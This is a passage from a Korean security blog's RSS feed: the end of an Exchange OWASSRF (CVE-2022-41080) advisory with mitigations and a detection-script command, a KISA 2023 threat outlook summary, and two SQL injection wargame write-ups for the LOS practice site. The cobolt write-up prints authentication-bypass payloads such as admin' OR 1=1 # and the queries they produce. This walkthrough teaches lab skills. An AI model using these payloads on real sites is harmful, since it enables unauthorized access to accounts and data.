&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;726&quot; data-origin-height=&quot;129&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/CJoAg/btrUMKinkaa/iLVogkGtWRML2U8yK1BkPk/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/CJoAg/btrUMKinkaa/iLVogkGtWRML2U8yK1BkPk/img.png&quot; data-alt=&quot;CVE-2022-41080 프론트엔드 요청&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/CJoAg/btrUMKinkaa/iLVogkGtWRML2U8yK1BkPk/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FCJoAg%2FbtrUMKinkaa%2FiLVogkGtWRML2U8yK1BkPk%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;730&quot; height=&quot;130&quot; data-origin-width=&quot;726&quot; data-origin-height=&quot;129&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;CVE-2022-41080 프론트엔드 요청&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;725&quot; data-origin-height=&quot;71&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/bHR3nd/btrUP05ylop/82aiesjCQKskOhAO5fzoIk/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/bHR3nd/btrUP05ylop/82aiesjCQKskOhAO5fzoIk/img.png&quot; data-alt=&quot;CVE-2022-41080 백엔드 요청&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/bHR3nd/btrUP05ylop/82aiesjCQKskOhAO5fzoIk/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FbHR3nd%2FbtrUP05ylop%2F82aiesjCQKskOhAO5fzoIk%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;730&quot; height=&quot;71&quot; data-origin-width=&quot;725&quot; data-origin-height=&quot;71&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;CVE-2022-41080 백엔드 요청&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&lt;b&gt;&lt;span style=&quot;color: #333333;&quot;&gt;대응방안&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&lt;span style=&quot;color: #333333;&quot;&gt;-&amp;nbsp;Microsoft社에서&amp;nbsp;배포한&amp;nbsp;보안&amp;nbsp;업데이트&amp;nbsp;적용(KB5019758) &lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;color: #333333;&quot;&gt;-&amp;nbsp;KB5019758&amp;nbsp;보안&amp;nbsp;업데이트&amp;nbsp;적용이&amp;nbsp;불가능한&amp;nbsp;경우&amp;nbsp;패치&amp;nbsp;적용&amp;nbsp;시까지&amp;nbsp;OWA&amp;nbsp;비활성화○&amp;nbsp;원격&amp;nbsp;Powershell&amp;nbsp;사용이&amp;nbsp;불필요한&amp;nbsp;경우&amp;nbsp;비활성화 &lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;color: #333333;&quot;&gt;-&amp;nbsp;CrowdStrike&amp;nbsp;Services에서&amp;nbsp;개발한&amp;nbsp;스크립트를&amp;nbsp;통한&amp;nbsp;IIS&amp;nbsp;및&amp;nbsp;원격&amp;nbsp;PowerShell&amp;nbsp;로그&amp;nbsp;파일&amp;nbsp;감사 &lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;color: #333333;&quot;&gt;*&amp;nbsp;참고자료&amp;nbsp;:&amp;nbsp;&lt;span style=&quot;color: #0593d3;&quot;&gt;&lt;a style=&quot;color: #0593d3;&quot; href=&quot;https://github.com/CrowdStrike/OWASSRF&quot; target=&quot;_blank&quot; rel=&quot;noopener&quot;&gt;https://github.com/CrowdStrike/OWASSRF&lt;/a&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&lt;span style=&quot;color: #333333;&quot;&gt;명령어&amp;nbsp; &lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;color: #333333;&quot;&gt;powershell&amp;nbsp;.\Rps_Http-IOC.ps1&amp;nbsp;[RPS_HTTP&amp;nbsp;Log&amp;nbsp;경로] &lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style=&quot;color: #333333;&quot;&gt;예시 &lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;color: #333333;&quot;&gt;powershell&amp;nbsp;.\Rps_Http-IOC.ps1&amp;nbsp;'C:\Program&amp;nbsp;Files\Microsoft\Exchange&amp;nbsp;Server\V15\Logging\CmdletInfra\Powershell-Proxy\Http&amp;rsquo; &lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style=&quot;color: #333333;&quot;&gt;파워쉘&amp;nbsp;스크립트&amp;nbsp;실행&amp;nbsp;정책으로 인해&amp;nbsp;실행이&amp;nbsp;안&amp;nbsp;될&amp;nbsp;경우 &lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;color: #333333;&quot;&gt;powershell&amp;nbsp;-executionpolicy&amp;nbsp;bypass&amp;nbsp;-file&amp;nbsp;Rps_Http-IOC.ps1&amp;nbsp;[RPS_HTTP&amp;nbsp;Log&amp;nbsp;경로]&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&lt;span style=&quot;color: #333333;&quot;&gt;참고&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&lt;span style=&quot;color: #333333;&quot;&gt;&lt;a style=&quot;color: #333333;&quot; href=&quot;https://www.crowdstrike.com/blog/owassrf-exploit-analysis-and-recommendations/&quot; target=&quot;_blank&quot; rel=&quot;noopener&quot;&gt;https://www.crowdstrike.com/blog/owassrf-exploit-analysis-and-recommendations/&lt;/a&gt;&lt;/span&gt;&lt;/p&gt;</description>
      <category>Code::Security/취약점</category>
      <category>CVE-2022-41040</category>
      <category>CVE-2022-41080</category>
      <category>CVE-2022-41082</category>
      <category>microsoft exchange</category>
      <category>Microsoft Exchange ProxyNotShell</category>
      <category>OWASSRF</category>
      <category>ProxyNotShell</category>
      <author>태군 코드</author>
      <guid isPermaLink="true">https://securitycode.tistory.com/264</guid>
      <comments>https://securitycode.tistory.com/264#entry264comment</comments>
      <pubDate>Wed, 28 Dec 2022 17:30:16 +0900</pubDate>
    </item>
    <item>
      <title>[KISA] 2023 사이버 보안 위협 전망</title>
      <link>https://securitycode.tistory.com/263</link>
      <description>&lt;p data-ke-size=&quot;size14&quot;&gt;1.&amp;nbsp;2022년&amp;nbsp;사이버&amp;nbsp;보안&amp;nbsp;위협&amp;nbsp;분석 &lt;br /&gt;- 국가&amp;middot;사회 혼란을 야기하는 사이버 공격 &lt;br /&gt;- 재택근무 확산, 클라우드 전환 등 IT환경 변화를 악용한 공격 &lt;br /&gt;- 디지털 사회를 마비시키는 랜섬웨어, 디도스 공격 &lt;br /&gt;&lt;br /&gt;2.&amp;nbsp;2023년&amp;nbsp;사이버&amp;nbsp;보안&amp;nbsp;위협&amp;nbsp;전망 &lt;br /&gt;- 국가&amp;middot;산업 보안을 위협하는 글로벌 해킹 조직의 공격 증가 &lt;br /&gt;- 재난, 장애 등 민감한 사회적 이슈를 악용한 사이버 공격 지속 &lt;br /&gt;- 지능형 지속 공격과 다중협박으로 무장한 랜섬웨어의 진화 &lt;br /&gt;- 디지털 시대 클라우드 전환에 따른 위협 증가 &lt;br /&gt;- 갈수록 복잡해지는 기업의 SW 공급망과 위협 증가&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;출처&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&lt;a href=&quot;https://krcert.or.kr/data/reportView.do?bulletin_writing_sequence=67084&quot;&gt;https://krcert.or.kr/data/reportView.do?bulletin_writing_sequence=67084&lt;/a&gt;&amp;nbsp;&lt;/p&gt;</description>
      <category>Code::보안공지</category>
      <category>2023 사이버 보안 위협 전망</category>
      <category>FORECAST</category>
      <category>forecast 2023</category>
      <category>KISA</category>
      <category>위협전망</category>
      <author>태군 코드</author>
      <guid isPermaLink="true">https://securitycode.tistory.com/263</guid>
      <comments>https://securitycode.tistory.com/263#entry263comment</comments>
      <pubDate>Wed, 28 Dec 2022 16:38:26 +0900</pubDate>
    </item>
    <item>
      <title>[LOS] Lord of the SQL Injection - cobolt</title>
      <link>https://securitycode.tistory.com/262</link>
      <description>&lt;p data-ke-size=&quot;size14&quot;&gt;&lt;b&gt;&lt;span style=&quot;color: #ee2323;&quot;&gt;허용받지&amp;nbsp;않은&amp;nbsp;서비스&amp;nbsp;대상으로&amp;nbsp;해킹을&amp;nbsp;시도하는&amp;nbsp;행위는&amp;nbsp;범죄&amp;nbsp;행위입니다.&amp;nbsp;&lt;/span&gt;해킹을&amp;nbsp;시도할&amp;nbsp;때에&amp;nbsp;발생하는&amp;nbsp;법적인&amp;nbsp;책임은&amp;nbsp;그것을&amp;nbsp;행한&amp;nbsp;사용자에게&amp;nbsp;있다는&amp;nbsp;것을&amp;nbsp;명심하시기&amp;nbsp;바랍니다.&lt;/b&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;조금 더 구체적인 내용들은 &lt;a href=&quot;https://securitycode.tistory.com/261&quot; target=&quot;_blank&quot; rel=&quot;noopener&quot;&gt;[LOS] Lord of the SQL Injection - gremlin&lt;/a&gt; 문제를 풀면서 작성해 두었고, 빠진 부분이나 필요한 부분들에 대해서는 조금씩 추가하면서 작성 하도록 하겠습니다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;652&quot; data-origin-height=&quot;323&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/nwBMM/btrUMPqdmI3/fWLLg0O62KJrJ1qZLYjWBK/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/nwBMM/btrUMPqdmI3/fWLLg0O62KJrJ1qZLYjWBK/img.png&quot; data-alt=&quot;cobolt&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/nwBMM/btrUMPqdmI3/fWLLg0O62KJrJ1qZLYjWBK/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FnwBMM%2FbtrUMPqdmI3%2FfWLLg0O62KJrJ1qZLYjWBK%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;650&quot; height=&quot;322&quot; data-origin-width=&quot;652&quot; data-origin-height=&quot;323&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;cobolt&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&lt;b&gt;[LOS]&amp;nbsp;Lord&amp;nbsp;of&amp;nbsp;the&amp;nbsp;SQL&amp;nbsp;Injection&amp;nbsp;-&amp;nbsp;cobolt&lt;/b&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;preg_match : prob _ . ( ) 문자열이 필터링되어 있고 i 옵션을 통하여 대소문자 구문을 하지 않고 있습니다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;id 값이 'admin'이 맞으면 풀리는 문제라는 것을 알수 있습니다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;쿼리문을 살펴보면 앞의 문제와는 다르게 pw 가 md5 함수로 고정되어 있는 것을 확인할 수 있습니다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;729&quot; data-origin-height=&quot;318&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/HDUiM/btrUOQ9RJBg/N815c4Z1bJedOSxpuK92C0/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/HDUiM/btrUOQ9RJBg/N815c4Z1bJedOSxpuK92C0/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/HDUiM/btrUOQ9RJBg/N815c4Z1bJedOSxpuK92C0/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FHDUiM%2FbtrUOQ9RJBg%2FN815c4Z1bJedOSxpuK92C0%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;650&quot; height=&quot;284&quot; data-origin-width=&quot;729&quot; data-origin-height=&quot;318&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;?id=admin&amp;amp;pw=admin&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;select&amp;nbsp;id&amp;nbsp;from&amp;nbsp;prob_cobolt&amp;nbsp;where&amp;nbsp;id='admin'&amp;nbsp;and&amp;nbsp;pw=md5('admin')&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;여기서 확인할 수 있는 것은 우리가 pw에 전달한 값은 md5('전달값')로 들어가는 것을 알 수 있습니다. 그럼 앞에서 풀어 보았던 데로 ' OR 1=1 # 값을 넣어 보도록 하겠습니다. &lt;span style=&quot;color: #ee2323;&quot;&gt;데이터베이스 종류별로 주석 처리 방법은 조금씩 차이가 있으므로, 점검 및 취약점 진단 시 상황에 맞게 주석처리를 사용해주어야 합니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;846&quot; data-origin-height=&quot;320&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/diVW0T/btrUOPiObAv/hfKzAGRNgNto3nuXlTMPBk/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/diVW0T/btrUOPiObAv/hfKzAGRNgNto3nuXlTMPBk/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/diVW0T/btrUOPiObAv/hfKzAGRNgNto3nuXlTMPBk/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FdiVW0T%2FbtrUOPiObAv%2FhfKzAGRNgNto3nuXlTMPBk%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;650&quot; height=&quot;246&quot; data-origin-width=&quot;846&quot; data-origin-height=&quot;320&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;?id=admin&amp;amp;pw=%27%20OR%201=1%23 : ?id=admin&amp;amp;pw=' OR 1=1 #&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;select id from prob_cobolt where id='admin' and pw=md5('' OR 1=1#')&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;pw 값을 참이 되게 입력을 하면 pw=md5('' OR 1=1 &lt;span style=&quot;color: #ee2323;&quot;&gt;')&amp;nbsp;&lt;span style=&quot;color: #333333;&quot;&gt;부분만 주석 처리가 되어 문법 에러가 발생하기 때문에 조건을 충족하지 않습니다.&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;833&quot; data-origin-height=&quot;420&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/dI1C0C/btrUQbsl9M0/gFxv4S76yk8hjdrbM2tV20/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/dI1C0C/btrUQbsl9M0/gFxv4S76yk8hjdrbM2tV20/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/dI1C0C/btrUQbsl9M0/gFxv4S76yk8hjdrbM2tV20/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FdI1C0C%2FbtrUQbsl9M0%2FgFxv4S76yk8hjdrbM2tV20%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;650&quot; height=&quot;328&quot; data-origin-width=&quot;833&quot; data-origin-height=&quot;420&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;?id=admin%27%20OR%201=1%20%23 : ?id=admin&lt;span style=&quot;color: #ee2323;&quot;&gt;' OR 1=1 #&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;select id from prob_cobolt where id='admin' OR 1=1 #' and pw=md5('')&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;id 값이 'admin' 이거나(OR) 참인 조건을 입력하면 admin이 아니라는 메시지를 확인할 수 있고, rubiya 계정이 존재하고 있는 것을 알 수 있습니다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;727&quot; data-origin-height=&quot;395&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/cbzCRm/btrUOQWisLI/oFqKKUGGewX8NaXobab361/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/cbzCRm/btrUOQWisLI/oFqKKUGGewX8NaXobab361/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/cbzCRm/btrUOQWisLI/oFqKKUGGewX8NaXobab361/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FcbzCRm%2FbtrUOQWisLI%2FoFqKKUGGewX8NaXobab361%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;650&quot; height=&quot;353&quot; data-origin-width=&quot;727&quot; data-origin-height=&quot;395&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;?id=admin%27%20%23 : ?id=admin&lt;span style=&quot;color: #ee2323;&quot;&gt;' #&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;select id from prob_cobolt where id='admin' #&lt;s&gt;' and pw=md5('')&lt;/s&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;위에서도 말한 거와 같이 id 값이 'admin'일 경우 풀리는 문제로 id를 'admin'으로 고정을 해주고 뒤에 실행되는 쿼리문을 주석처리 해주면 풀리는 문제입니다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;?id=admin%27%20OR%201=2%20%23 : ?id=admin' OR 1=2 # -&amp;gt; id가 'admin' 이거나 거짓 조건일 경우&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;select id from prob_cobolt where id='admin' OR 1=2 #&lt;s&gt;' and pw=md5('')&lt;/s&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;?id=admin%27%20AND%201=1%20%23 : ?id=admin' AND 1=1 # -&amp;gt; id가 'admin'이고 참일 경우&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;select id from prob_cobolt where id='admin' AND 1=1 #&lt;s&gt;' and pw=md5('')&lt;/s&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;다른 방법으로는 id가 'admin' 이고 거짓 또는 참인 조건을 만들어 id가 'admin' 값만 표시되게 질의할 수 있습니다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;처음부터 id값을 'admin'으로 하는 방법도 있었겠지만, 해당 블로그를 보시는 분들이 조금이나마 눈으로 보고 익혔으면 하는 바람으로 여러 가지 방법을 시도해 보았습니다. 위의 방법 말고도 다른 방법으로도 직접 쿼리문을 조작하여 확인해 보시기를 추천드립니다.&lt;/p&gt;</description>
      <category>Code::War Game/los.rubiya.kr</category>
      <category>cobolt</category>
      <category>lord of sql injection</category>
      <category>Lord of SQL Injection cobolt</category>
      <category>Lord of SQLInjection</category>
      <category>Los</category>
      <category>sql injection</category>
      <category>워게임</category>
      <category>웹 해킹</category>
      <author>태군 코드</author>
      <guid isPermaLink="true">https://securitycode.tistory.com/262</guid>
      <comments>https://securitycode.tistory.com/262#entry262comment</comments>
      <pubDate>Wed, 28 Dec 2022 16:02:50 +0900</pubDate>
    </item>
    <item>
      <title>[LOS] Lord of the SQL Injection - gremlin</title>
      <link>https://securitycode.tistory.com/261</link>
      <description>&lt;p data-ke-size=&quot;size14&quot;&gt;&lt;b&gt;&lt;span style=&quot;color: #ee2323;&quot;&gt;허용받지&amp;nbsp;않은&amp;nbsp;서비스&amp;nbsp;대상으로&amp;nbsp;해킹을&amp;nbsp;시도하는&amp;nbsp;행위는&amp;nbsp;범죄&amp;nbsp;행위입니다.&lt;/span&gt;&amp;nbsp;해킹을&amp;nbsp;시도할&amp;nbsp;때에&amp;nbsp;발생하는&amp;nbsp;법적인&amp;nbsp;책임은&amp;nbsp;그것을&amp;nbsp;행한&amp;nbsp;사용자에게&amp;nbsp;있다는&amp;nbsp;것을&amp;nbsp;명심하시기&amp;nbsp;바랍니다.&lt;/b&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;SQL Injection 공격은 임의의 SQL 쿼리문을&amp;nbsp; 삽입한다는 게 가장 중요한 포인트입니다. 내가 삽입한 SQL 쿼리문이 서버에 어떻게 삽입되는지 그리고 DB에서 어떻게 실행되는 눈으로 보면 조금 더 이해하기가 쉬울 거라고 생각이 듭니다. LOS 사이트는 서버에서 완성되고 실행되는 SQL 쿼리문을 눈으로 확인할 수 있고, 내가 넣은 쿼리가 SQL 질의문이 어떻게 만들어지는지 확인할 수 있습니다. 이렇게 직접 눈으로 확인하면서 한 단계씩 풀어 보도록 하겠습니다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&lt;b&gt;GET&amp;nbsp;방식&amp;nbsp;데이터&amp;nbsp;전송&lt;/b&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;- 데이터를 URL에 포함하여 값을 전달하는 방식 입니다.&lt;br /&gt;- URL의 길이가 제한되기 때문에 전송할 수 있는 데이터의 한계가 있을 수 있습니다.&lt;br /&gt;- 모든 데이터가 URL에 노출되기 때문에 POST 방식에 비해 보안에 취약합니다.&lt;br /&gt;- 한글, 공백, 특수문자 등 URL Encoding 처리를 해줘야 전송할 수 있습니다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;- 구분자 &quot;?&quot; 뒤에 오는 것이 파라미터(값)가 되고, 파라미터 값이 여러 개 있다면 구분자 &quot;&amp;amp;&quot;를 두어 파라미터를 구분할 수 있습니다.&lt;br /&gt;&lt;br /&gt;GET 방식은 클라이언트의 데이터를 URL뒤에 붙여서 보냅니다. 위에서 쓴 예시처럼 아이디와 패스워드를 보낸다고 가정하면&lt;br /&gt;&lt;br /&gt;www.testget.com?id=test&amp;amp;pass=1234 이런 식으로 값을 전달할 수 있으며, URL 뒤에 &quot;?&quot; 통해 URL의 끝을 알리면서, 데이터 표현의 시작점을 알립니다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;863&quot; data-origin-height=&quot;303&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/cdotDb/btrUHSnejwP/HxiHdpRTwd9XuyGiQiblT0/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/cdotDb/btrUHSnejwP/HxiHdpRTwd9XuyGiQiblT0/img.png&quot; data-alt=&quot;gremlin&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/cdotDb/btrUHSnejwP/HxiHdpRTwd9XuyGiQiblT0/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FcdotDb%2FbtrUHSnejwP%2FHxiHdpRTwd9XuyGiQiblT0%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;750&quot; height=&quot;263&quot; data-origin-width=&quot;863&quot; data-origin-height=&quot;303&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;gremlin&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&lt;b&gt;[LOS]&amp;nbsp;Lord&amp;nbsp;of&amp;nbsp;the&amp;nbsp;SQL&amp;nbsp;Injection&amp;nbsp;-&amp;nbsp;gremlin&lt;/b&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;해당 문제를 살펴보면 GET 방식이라는 것을 알 수 있고, URL 데이터를 담아 값을 전달 할수 있다는 것을 알수 있습니다. 그럼 값을 전달해 보도록 하겠습니다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
